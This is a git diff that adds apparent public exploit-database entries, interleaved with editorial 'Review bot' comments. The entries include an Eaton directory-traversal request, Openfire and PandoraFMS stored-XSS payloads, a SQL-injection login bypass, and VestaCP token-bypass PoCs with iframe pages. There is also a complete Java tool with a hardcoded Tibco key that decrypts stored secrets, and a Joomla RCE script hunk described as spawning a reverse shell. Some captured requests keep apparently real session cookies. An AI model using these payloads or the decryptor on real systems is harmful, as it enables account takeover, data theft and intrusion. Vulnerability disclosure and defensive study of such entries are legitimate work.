diff --git a/exploits/hardware/webapps/48614.txt b/exploits/hardware/webapps/48614.txt
new file mode 100644
index 000000000..717c037e3
--- /dev/null
+++ b/exploits/hardware/webapps/48614.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Eaton Intelligent Power Manager 1.6 - Directory Traversal
+# Date: 2018-09-29
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://powerquality.eaton.com/
+# Software Link: https://powerquality.eaton.com/Support/Software-Drivers/default.asp?cx=-999
+# Version: v1.6
+# Tested on: Windows
+
+# CVE-2018-12031
+# https://nvd.nist.gov/vuln/detail/CVE-2018-12031
+# https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
+
+# PoC
+To exploit vulnerability, someone could use
+'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../'
+request to get some informations from the target.
+
+GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host
+HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0)
+Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
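Review bot: The entry does not say whether the `downloadFirmware` request needs an authenticated session or which release fixes the issue, so a reader cannot judge exposure from the text alone. A `# Authentication:` line and a `# Fixed in:` line in the header would close that gap, with values taken from the vendor advisory for CVE-2018-12031. The request is also broken across lines, with `HTTP/1.1` and the second half of `User-Agent` on lines of their own, which looks like mail wrapping rather than intent. For log review, the distinguishing feature shown here is a `firmware` parameter on `/server/node_upgrade_srv.js` that contains `../` sequences.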
diff --git a/exploits/jsp/webapps/49229.txt b/exploits/jsp/webapps/49229.txt
new file mode 100644
index 000000000..d116f4be6
--- /dev/null
+++ b/exploits/jsp/webapps/49229.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Openfire 4.6.0 - 'path' Stored XSS
+# Date: 20201209
+# Exploit Author: j5s
+# Vendor Homepage: https://github.com/igniterealtime/Openfire
+# Software Link: https://www.igniterealtime.org/downloads/
+# Version: 4.6.0
+
+POST /plugins/nodejs/nodejs.jsp HTTP/1.1
+Host: 192.168.137.137:9090
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101
+Firefox/68.0
+Content-Length: 60
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded
+Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0;
+csrf=dWiihlZamEAB0mrO; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn;
+jiveforums.admin.logviewer=debug.size=0&all.size=524269&warn.size=856459&error.size=0&info.size=145819
+Origin: http://192.168.137.137:9090
+Referer: http://192.168.137.137:9090/plugins/nodejs/nodejs.jsp
+Upgrade-Insecure-Requests: 1
+Accept-Encoding: gzip
+
+path=%22%3E%3CScRiPt%3Eaozunukfyd%3C%2FsCrIpT%3E&update=Save
+
+payload:"><ScRiPt>alert(document.cookie)</ScRiPt>
\ No newline at end of file
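Review bot: The captured request still carries what look like real session values in its `Cookie` header (`JSESSIONID`, `csrf`, `DWRSESSIONID`) and a private host address. Published entries normally replace these with placeholders such as `JSESSIONID=[SESSION]` and `Host: [TARGET]`; the `PHPSESSID` values in 48700.txt, 49219.txt and 49220.txt have the same problem. The entry also has no description: the title names Openfire 4.6.0 but the request targets `/plugins/nodejs/nodejs.jsp`, so it should state whether the flaw is in the core or in a plugin. It should also state whether an authenticated admin-console session is required, which the cookie implies but the text does not say.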
diff --git a/exploits/multiple/local/49221.java b/exploits/multiple/local/49221.java
new file mode 100644
index 000000000..949b25bfa
--- /dev/null
+++ b/exploits/multiple/local/49221.java
@@ -0,0 +1,136 @@
+# Exploit Title: Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption
+# Date: December 8th 2020
+# Exploit Author: Tess Sluijter
+# Vendor Homepage: https://www.tibco.com
+# Version: 5.11x and before
+# Tested on: MacOS, Linux, Windows
+
+# Tibco password decryption exploit
+
+## Background
+
+Tibco's documentation states that there are three modes of operation for this ObfuscationEngine tooling:
+
+1. Using a custom key.
+2. Using a machine key.
+3. Using a fixed key.
+
+https://docs.tibco.com/pub/runtime_agent/5.11.1/doc/pdf/TIB_TRA_5.11.1_installation.pdf?id=2
+
+This write-up pertains to #3 above. 
+Secrets obfuscated using the Tibco fixed key can be recognized by the fact that they start with the characters #!. For example: "#!oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA".
+
+## Issues
+
+On Tibco's forums, but also on other websites, people have already shared Java code to decrypt secrets encrypted with this fixed key. For example:
+
+* https://support.tibco.com/s/article/Tibco-KnowledgeArticle-Article-30338
+* https://community.tibco.com/questions/password-encryptiondecryption
+* https://community.tibco.com/questions/deobfuscatedecrypt-namevaluepairpassword-gv-file
+* https://community.tibco.com/questions/bw6-password-decrypt
+* http://tibcoworldin.blogspot.com/2012/08/decrypting-password-data-type-global.html
+* http://tibcoshell.blogspot.com/2016/07/how-to-decrypt-encryptedmasked-password.html
+
+## Impact
+
+Regardless of country, customer, network or version of Tibco, any secret that was obfuscated with Tibco's ObfuscationEngine can be decrypted using my Java tool. It does **not** require access to Tibco software or libraries. All you need are exfiltrated secret strings that start with the characters #!. This is not going to be fixed by Tibco, this is a design decision also used for backwards compatibility in their software.
+
+## Instructions
+
+Compile with:
+
+javac decrypt.java
+
+Examples of running, with secrets retrieved from websites and forums:
+
+java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA
+7474
+
+java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP
+tibco
+
+/* comments!
+Compile with: 
+		javac decrypt.java
+		
+Run as:
+		java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA
+		7474
+		
+		java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP
+		tibco
+ */
+
+import java.io.ByteArrayInputStream;
+import java.util.Arrays;
+import java.util.Base64;
+import javax.crypto.Cipher;
+import javax.crypto.SecretKey;
+import javax.crypto.spec.SecretKeySpec;
+import javax.crypto.spec.IvParameterSpec;
+import javax.crypto.CipherInputStream;
+import javax.crypto.CipherOutputStream;
+
+
+class Decrypt
+{
+	public static void main (String [] arguments)
+	{
+		try
+		{
+			byte[] keyBytes = { 28, -89, -101, -111, 91, -113, 26, -70, 98, -80, -23, -53, -118, 93, -83, -17, 28, -89, -101, -111, 91, -113, 26, -70 };
+	
+			String algo = "DESede/CBC/PKCS5Padding";
+		
+			String encryptedText = arguments[0];
+			byte[] message = Base64.getDecoder().decode(encryptedText);
+
+			ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(message);
+	
+			Cipher decipher = Cipher.getInstance(algo);
+
+			int i = decipher.getBlockSize();
+			byte[] ivSetup = new byte[i];
+			byteArrayInputStream.read(ivSetup);
+
+			SecretKey key = new SecretKeySpec(keyBytes, 0, keyBytes.length, "DESede");
+	  
+			decipher.init(2, key, new IvParameterSpec(ivSetup));
+	
+			// Magic, I admit I don't understand why this is needed.
+			CipherInputStream cipherInputStream = new CipherInputStream(byteArrayInputStream, decipher);
+			char[] plaintext;
+			char[] arrayOfChar1 = new char[(message.length - i) / 2];
+			byte[] arrayOfByte4 = new byte[2];
+			byte b = 0;
+
+			while (2 == cipherInputStream.read(arrayOfByte4, 0, 2)) {
+				arrayOfChar1[b++] = (char)((char)arrayOfByte4[1] << '\b' | (char)arrayOfByte4[0]);
+			}
+			
+			cipherInputStream.close();
+  
+			if (b == arrayOfChar1.length) {
+				plaintext = arrayOfChar1;
+			} else {
+				char[] arrayOfChar = new char[b];
+				System.arraycopy(arrayOfChar1, 0, arrayOfChar, 0, b);
+				for (b = 0; b < arrayOfChar1.length; b++) {
+				arrayOfChar1[b] = Character.MIN_VALUE;
+				}
+
+				plaintext = arrayOfChar;
+				// End of Magic
+			} 
+  
+			System.out.println(plaintext);
+
+		}
+
+		catch (Exception ex)
+		{
+			System.out.println("Barf...");
+			System.out.println(ex);
+		}
+	}
+}
\ No newline at end of file
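Review bot: The file does not compile as Java as committed, because the `#`-prefixed header and the Markdown write-up at the top of the hunk sit outside the comment block that only opens at `/* comments!`; moving the opening `/*` above `# Exploit Title` would fix that. The comment `// Magic, I admit I don't understand why this is needed.` can be replaced by what the loop visibly does, e.g. `// Read the decrypted stream two bytes at a time and combine each pair, low byte first, into one char`, with a second line saying the else branch copies the filled prefix and overwrites the scratch array with `Character.MIN_VALUE`. `decipher.init(2, ...)` reads better as `decipher.init(Cipher.DECRYPT_MODE, ...)`, and `byte b` as the array index wraps negative after 127 chars, which an `int` avoids. For defenders the practical reading of the write-up is that any `#!`-prefixed value is recoverable by anyone holding the string, so such values deserve the same handling as plaintext credentials.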
diff --git a/exploits/multiple/webapps/49165.txt b/exploits/multiple/webapps/49165.txt
new file mode 100644
index 000000000..95aaa00d5
--- /dev/null
+++ b/exploits/multiple/webapps/49165.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Employee Record Management System 1.1 - Login Bypass SQL Injection
+# Date: 2020–11–17
+# Exploit Author: Anurag Kumar Rawat(A1C3VENOM)
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/
+# Version: 1.1
+# Tested on Parrot os(Linux)
+
+Attack Vector:
+An attacker can gain admin panel access using malicious sql injection quiries.
+
+Steps to reproduce:
+1. Open admin login page using following URl:
+-> http://localhost/erms/admin/index.php
+
+2. Now put below Payload in both the fields( User ID & Password)
+Payload: ' or '1'='1
+
+3)Server accept this payload and attacker successfully bypassed admin panel
+without any credentials
\ No newline at end of file
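Review bot: The `# Date:` line uses en dashes (`2020–11–17`) rather than hyphens, so it will not parse as an ISO date; `# Date: 2020-11-17` would match the other entries in this commit. The steps also switch numbering style at `3)`. The entry states the effect but not the cause or the remedy. Presumably the login query is built by concatenating the two fields, in which case one line naming parameterized queries as the fix would make the entry more useful to maintainers.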
diff --git a/exploits/multiple/webapps/49219.txt b/exploits/multiple/webapps/49219.txt
new file mode 100644
index 000000000..4276cdfa2
--- /dev/null
+++ b/exploits/multiple/webapps/49219.txt
@@ -0,0 +1,313 @@
+# Exploit Title: VestaCP 0.9.8-26 - 'LoginAs' Insufficient Session Validation
+# Date: 2020-11-26
+# Exploit Author: Vulnerability-Lab
+# Vendor Homepage: https://vestacp.com/
+# Software Link: https://vestacp.com/install/
+# Version: 0.9.8-26
+
+Document Title:
+===============
+VestaCP v0.9.8-26 - (LoginAs) Token Session Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2240
+
+
+Release Date:
+=============
+2020-11-26
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2240
+
+
+Common Vulnerability Scoring System:
+====================================
+8.3
+
+
+Vulnerability Class:
+====================
+Insufficient Session Validation
+
+
+Current Estimated Price:
+========================
+2.000€ - 3.000€
+
+
+Product & Service Introduction:
+===============================
+Web interface is open source php and javascript interface based on Vesta
+open API, it uses 381 vesta CLI calls.
+The GNU General Public Licence is a free, copyleft licence for software
+and other kinds of works. Its free to change,
+modify and redistribute source code.
+
+(Copy of the Homepage: https://vestacp.com/features/ &
+https://vestacp.com/install/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a
+insufficient session validation vulnerability in the VestaCP v0.9.8-26
+hosting web-application.
+
+
+Affected Product(s):
+====================
+Vesta
+Product: VestaCP v0.9.8-26 - Hosting Control Panel (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-04: Researcher Notification & Coordination (Security Researcher)
+2020-05-05: Vendor Notification (Security Department)
+2020-05-07: Vendor Response/Feedback (Security Department)
+2020-**-**: Vendor Fix/Patch (Service Developer Team)
+2020-**-**: Security Acknowledgements (Security Department)
+2020-11-26: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Pre Auth (No Privileges or Session)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Full Disclosure
+
+
+Technical Details & Description:
+================================
+A session token vulnerability has been discovered in the official
+VestaCP (Control Panel) v0.9.8-26 hosting web-application.
+The vulnerability allows remote attackers to gain unauthenticated or
+unauthorized access by client-side token manipulation.
+
+The token vulnerability is located in the function of the `LoginAs`
+module. Remote attackers are able to perform LoginAs requests
+without session token to preview there profiles. The attack requires
+user account privileges for manipulation of the request.
+The admin panel allows to request via token the local user accounts to
+login as via account switch. In that moment the token
+of the request can be removed to perform the same interaction with user
+privileges. Thus allows to access other account
+information without administrative permissions. The permission approval
+on login request is insufficient regarding a
+misconfiguration on the token implementation (client-side).
+
+Successful exploitation of the web vulnerability results in information
+disclosure, user or admin account compromise and
+elevation of privileges by further exploitation.
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] /login/
+
+Vulnerable Parameter(s):
+[+] token
+
+Affected Parameter(s):
+[+] loginas
+
+
+Proof of Concept (PoC):
+=======================
+The token web vulnerability can be exploited by remote attackers with
+simple user privileges without user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Request: Default (Download Backup)
+https://vestacp.localhost:8083/login/?loginas=user&token=f230a989082eec102ad5a3bb81fd0190
+https://vestacp.localhost:8083/login/?loginas=admin&token=f230a989082eec102ad5a3bb81fd0190
+
+
+PoC: Exploitation
+https://vestacp.localhost:8083/login/?loginas=user/.admin&token=null
+
+
+PoC: Exploit
+<html>
+<head><body>
+<title>VestaCP (Control Panel) v0.9.8-26 - LoginAs User/Admin PoC</title>
+<iframe
+src="https://vestacp.localhost:8083/login/?loginas=admin&token=null"%20>
+</body></head>
+<html>
+
+
+
+--- PoC Session Logs [GET] ---
+https://vestacp.localhost:8083/login/?loginas=[ACCOUNTNAME]&token=null
+Host: vestacp.localhost:8083
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Referer: https://vestacp.localhost:8083/list/user/
+Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6;
+__utmc=80953744;
+__utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/;
+
+_ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2;
+PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0;
+__utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1;
+metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1
+-
+GET: HTTP/1.1 302 Moved Temporarily
+Server: nginx
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Keep-Alive: timeout=120
+Location: /
+-
+https://vestacp.localhost:8083/
+Host: vestacp.localhost:8083
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Referer: https://vestacp.localhost:8083/list/user/
+Connection: keep-alive
+Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6;
+__utmc=80953744;
+__utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/;
+
+_ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2;
+PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0;
+__utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1;
+metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1
+-
+GET: HTTP/1.1 302 Moved Temporarily
+Server: nginx
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Keep-Alive: timeout=120
+-
+Location: /list/user/
+https://vestacp.localhost:8083/list/user/
+Host: vestacp.localhost:8083
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Referer: https://vestacp.localhost:8083/list/user/
+Connection: keep-alive
+Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6;
+__utmc=80953744;
+__utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/;
+
+_ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2;
+PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0;
+__utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1;
+metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1
+-
+GET: HTTP/1.1 200 OK
+Server: nginx
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Keep-Alive: timeout=120
+Content-Encoding: gzip
+-
+Welcome - Logged in as user admin
+
+
+Reference(s):
+https://vestacp.localhost:8083/
+https://vestacp.localhost:8083/login/
+https://vestacp.localhost:8083/login/?loginas
+https://vestacp.localhost:8083/list/user/
+
+
+Security Risk:
+==============
+The security risk of the remote session vulnerability in the vestacp
+application is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
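Review bot: The advisory contradicts itself on the access needed: `Authentication Type` says `Pre Auth (No Privileges or Session)`, while the technical description says `The attack requires user account privileges` and the PoC section says `with simple user privileges`; the session log also sends a `PHPSESSID` cookie. 49220.txt has the same mismatch (`Restricted Authentication (Guest Privileges)` against `without permission, authentication or authorization`). Because this field decides how the issue is triaged, it should match the body; from the visible requests, an authenticated low-privilege session appears to be the precondition. The `2020-**-**` patch lines also leave it unclear whether a fixed release exists.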
diff --git a/exploits/multiple/webapps/49220.txt b/exploits/multiple/webapps/49220.txt
new file mode 100644
index 000000000..589b4ba3d
--- /dev/null
+++ b/exploits/multiple/webapps/49220.txt
@@ -0,0 +1,258 @@
+# Exploit Title: VestaCP 0.9.8-26 - 'backup' Information Disclosure
+# Date: 2020-11-25
+# Exploit Author: Vulnerability-Lab
+# Vendor Homepage: https://vestacp.com/
+# Software Link: https://vestacp.com/install/
+# Version: 0.9.8-26
+
+Document Title:
+===============
+VestaCP v0.9.8-26 - Insufficient Session Validation Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2238
+
+
+Release Date:
+=============
+2020-11-25
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2238
+
+
+Common Vulnerability Scoring System:
+====================================
+7
+
+
+Vulnerability Class:
+====================
+Insufficient Session Validation
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Web interface is open source php and javascript interface based on Vesta
+open API, it uses 381 vesta CLI calls.
+The GNU General Public Licence is a free, copyleft licence for software
+and other kinds of works. Its free to change,
+modify and redistribute source code.
+
+(Copy of the Homepage: https://vestacp.com/features/ &
+https://vestacp.com/install/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a
+insufficient session validation vulnerability in the VestaCP v0.9.8-26
+hosting web-application.
+
+
+Affected Product(s):
+====================
+Vesta
+Product: VestaCP v0.9.8-26 - Hosting Control Panel (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-04: Researcher Notification & Coordination (Security Researcher)
+2020-05-05: Vendor Notification (Security Department)
+2020-05-07: Vendor Response/Feedback (Security Department)
+2020-**-**: Vendor Fix/Patch (Service Developer Team)
+2020-**-**: Security Acknowledgements (Security Department)
+2020-11-25: Public Disclosure (Vulnerability Laboratory)
+
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Restricted Authentication (Guest Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Full Disclosure
+
+
+Technical Details & Description:
+================================
+An insufficient session validation vulnerability has been discovered in
+the official VestaCP (Control Panel) v0.9.8-26 hosting web-application.
+The vulnerability allows remote attackers to gain sensitive
+web-application data or information without permission, authentication
+or authorization.
+
+The backup url includes a token parameter for the download request on
+backups. The mechanism is to secure that other users can only download the
+backup with the token to confirm the permission. The token is not
+required for the download and can be deattached in the client-side
+session request.
+The session validation of the backup download request is insufficient
+validating the request without token parameter approval. Next to that
+the backup
+uses the name of the privileges in combination with the date in a tar
+compressed folder. Thus allows a remote attacker with low user
+privileges to
+download the backup data without permission.
+
+Successful exploitation of the session web vulnerability results in
+information disclosure of the local application and dbms backup files.
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] /download/backup/
+
+Vulnerable Parameter(s):
+[+] token
+
+Affected Parameter(s):
+[+] backup
+
+
+Proof of Concept (PoC):
+=======================
+The insufficient session validation vulnerability can be exploited by
+remote attackers with simple user privileges without user interaction.
+For security demonstration or to reproduce the information disclosure
+issue follow the provided information and steps below to continue.
+
+
+Request: Default (Download Backup)
+https://vestacp.localhost:8083/download/backup/?backup=user.2020-04-28_00-00-17.tar&token=d6f4a3a923ab5c60ef0a52995245a3d4
+https://vestacp.localhost:8083/download/backup/?backup=admin.2020-04-28_00-00-17.tar&token=d6f4a3a923ab5c60ef0a52995245a3d4
+
+
+PoC: Exploitation
+https://vestacp.localhost:8083/download/backup/?backup=[USER/ADMIN].[YYYY-MM-DD_HH-MM-SS].tar
+https://vestacp.localhost:8083/download/backup/?backup=user.2020-04-28_00-00-17.tar
+https://vestacp.localhost:8083/download/backup/?backup=admin.2020-04-28_00-00-17.tar
+
+
+PoC: Exploit
+<html>
+<head><body>
+<title>VestaCP (Control Panel) v0.9.8-26 - Information Disclosure
+(Backup)</title>
+<iframe
+src=https://vestacp.localhost:8083/download/backup/?backup=[USER/ADMIN].[YYYY-MM-DD_HH-MM-SS].tar>
+</body></head>
+<html>
+
+
+--- PoC Session Logs [GET] ---
+https://vestacp.localhost:8083/download/backup/?backup=user.2020-**-**_00-00-17.tar
+Host: vestacp.localhost:8083
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Cookie: PHPSESSID=4neq25hga91vqrf4maktd4q073;
+-
+GET: HTTP/1.1 200 OK
+Server: nginx
+Content-Type: application/gzip
+Content-Length: 3891200
+Connection: keep-alive
+Content-Disposition: attachment; filename="user.2020-**-**_00-00-17.tar";
+Accept-Ranges: bytes
+
+
+Reference(s):
+https://vestacp.localhost:8083/
+https://vestacp.localhost:8083/download/
+https://vestacp.localhost:8083/download/backup/
+https://vestacp.localhost:8083/download/backup/?backup
+
+
+Security Risk:
+==============
+The security risk of the session validation web vulnerability in the
+vestacp web-application is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/exploits/php/webapps/39033.py b/exploits/php/webapps/39033.py
index 83c91739a..1095f0049 100755
--- a/exploits/php/webapps/39033.py
+++ b/exploits/php/webapps/39033.py
@@ -1,17 +1,17 @@
 #!/usr/bin/env python
 
-# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
+# Exploit Title: Joomla 1.5 - 3.4.6 Object Injection RCE X-Forwarded-For header
 # Date: 12/17/2015
 # Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)
 # Vendor Homepage: https://www.joomla.org/
 # Software Link: http://joomlacode.org/gf/project/joomla/frs/
-# Version: Joomla 1.5 - 3.4.5
+# Version: Joomla 1.5 - 3.4.6
 # Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)
 # CVE : CVE-2015-8562
 
 
 '''
-    Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562
+    Joomla 1.5 - 3.4.6 Object Injection RCE - CVE-2015-8562
     PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE
 
     Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com): 
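Review bot: Raising the upper bound to 3.4.6 in the title, the `# Version:` line and the docstring conflicts with the CVE the file still cites: CVE-2015-8562 is described as affecting Joomla releases before 3.4.6, which makes 3.4.6 the fixing release. If the intent is to record that the script also works against 3.4.6, that would be a different issue from CVE-2015-8562 and the `# CVE :` line should say so; otherwise `3.4.5` was the accurate bound. The `# Tested on:` line (Joomla! 3.2.1) gives no evidence either way. The docstring continues past the end of the hunk.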
diff --git a/exploits/php/webapps/48700.txt b/exploits/php/webapps/48700.txt
new file mode 100644
index 000000000..5c18b5607
--- /dev/null
+++ b/exploits/php/webapps/48700.txt
@@ -0,0 +1,54 @@
+# Exploit Title: PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting
+# Date: 2020-08-20
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://pandorafms.org/
+# Software Link: https://pandorafms.org/features/free-download-monitoring-software/
+# Version: 7.0NG747
+# Tested on: Windows/Linux/ISO
+
+# Link https://github.com/EmreOvunc/Pandora-FMS-7.0-NG-747-Stored-XSS
+
+# Description
+A stored cross-site scripting (XSS) in Pandora FMS 7.0 NG 747 can result in
+an attacker performing malicious actions to users who open a maliciously
+crafted link or third-party web page. (Workspace >> Issues >> List of
+issues >> Add - Attachment)
+
+# PoC
+
+To exploit vulnerability, someone could use a POST request to
+'/pandora_console/index.php' by manipulating 'filename' parameter in the
+request body to impact users who open a maliciously crafted link or
+third-party web page.
+
